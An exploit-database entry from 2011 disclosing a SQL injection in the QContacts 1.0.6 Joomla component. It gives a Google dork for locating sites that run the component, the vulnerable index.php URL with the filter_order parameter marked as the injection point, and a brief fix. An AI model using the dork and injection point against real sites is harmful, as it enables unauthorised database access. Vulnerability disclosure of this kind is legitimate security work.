QContacts 1.0.6 (Joomla component) SQL injection
| EKU-ID: 1404 | CVE: | OSVDB-ID: |
| Author: Don | Published: 2011-12-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1404 | CVE: | OSVDB-ID: |
| Author: Don | Published: 2011-12-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
############################################################################
# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*
# Google Dork: inurl:"/components/com_qcontacts/"
# Date: Decembar/08/2011
# Author: Don (BalcanCrew & BalcanHack)
# Software Link: *
http://www.latenight-coding.com/joomla-addons/qcontacts.html*
# Version: 1.0.6
# Tested on: Apache
############################################################################
Vulnerability:
This vulnerability affects /index.php
*
/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
*
How to fix this vulnerability:
*Filter metacharacters from user input.*
*~Don 2011*